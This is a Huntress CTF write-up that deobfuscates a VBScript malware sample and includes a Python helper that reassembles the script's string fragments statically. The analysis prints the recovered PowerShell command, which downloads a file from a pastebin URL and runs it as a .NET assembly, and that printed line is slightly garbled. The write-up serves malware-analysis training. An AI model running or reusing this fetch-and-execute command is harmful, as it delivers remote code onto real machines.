Huntress CTF (VeeBeeEes)
The malware file you are given to inspect is called veebeeeee, a Visual Basic Script file.
CyberChef has an operation called Microsoft Script Decoder.
When you upload the veebeeeee file to CyberChef and apply the decoder, you get the output shown in the screenshots.
Taking out all the ', al37ysoeopm'al37ysoeopm and " " filler makes the script much easier to read.
We can see that several values are each assembled from numbered pieces:
Power = Power0 + Power1 + Power2 + Power3 + Power4 + Power5
Path = Path0 + Path1 + Path2 + Path3 + Path4 + Path5
Reqest = Reqest0 + Reqest1 + Reqest2 + Reqest3 + Reqest4 + Reqest5
InvokeReqest = InvokeReqest0 + InvokeReqest1 + InvokeReqest2 + InvokeReqest3 + InvokeReqest4 + InvokeReqest5
ExecAssem = ExecAssem0 + ExecAssem1 + ExecAssem2 + ExecAssem3 + ExecAssem4 + ExecAssem5
And finally:
CollectThenReplace Power , Path , Reqest , InvokeReqest , ExecAssem
Once you concatenate all the values you get:
PowerShell$f='C:\Users\Public\Documents\July.htm'; if (!(Test-Path $f)){Invoke-WebRequest 'https://pastebin.com/raw/SiYGwwcz' -outfile $f }; [System.Reflection.Assembly]::loadfy]::loadfile($f); [WorkAreaWork]:Exe()
The flag is contained in https://pastebin.com/raw/SiYGwwcz
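The cleanup and concatenation steps above can be done statically, without running the script. The following is an added example, not code from the challenge: the sample lines, the fragment boundaries and the function names are constructed for illustration. It strips the filler only outside string literals, because deleting every ' blindly would also remove the quotes inside the PowerShell command.

```python
import re

# Constructed sample imitating the decoded layout; fragment boundaries and the
# shortened set of variables are assumptions, not the real challenge file.
SAMPLE = r"""
Power0 = "Pow"''''''''al37ysoeopm'al37ysoeopm
Power1 = "erS"''''''''al37ysoeopm'al37ysoeopm
Power2 = "hell "''''''''al37ysoeopm'al37ysoeopm
Path0 = "$f='C:\Users\Pub"''''''''al37ysoeopm'al37ysoeopm
Path1 = "lic\Documents\July.htm';"''''''''al37ysoeopm'al37ysoeopm
Power = Power0 + Power1 + Power2''''''''al37ysoeopm
Path = Path0 + Path1''''''''al37ysoeopm
CollectThenReplace Power , Path''''''''al37ysoeopm
"""

ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+)$')
# A term is either a "..." literal (VBScript escapes a quote as "") or a name.
TERM = re.compile(r'"((?:[^"]|"")*)"|(\w+)')


def strip_comment(line):
    """Cut the line at the first apostrophe that sits outside a "..." literal."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i].rstrip()
    return line.rstrip()


def resolve(script):
    """Evaluate `name = "lit"` and `name = a + b` lines as text; nothing runs."""
    values = {}
    for raw in script.splitlines():
        m = ASSIGN.match(strip_comment(raw))
        if not m:
            continue  # calls such as CollectThenReplace are not assignments
        name, expr = m.groups()
        values[name] = "".join(
            t.group(1).replace('""', '"') if t.group(1) is not None
            else values.get(t.group(2), "<" + t.group(2) + "?>")
            for t in TERM.finditer(expr))
    return values


if __name__ == "__main__":
    resolved = resolve(SAMPLE)
    print(resolved["Power"] + resolved["Path"])
```

Unknown names are left as `<name?>` markers, so a fragment the parser missed is visible in the result instead of silently disappearing.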














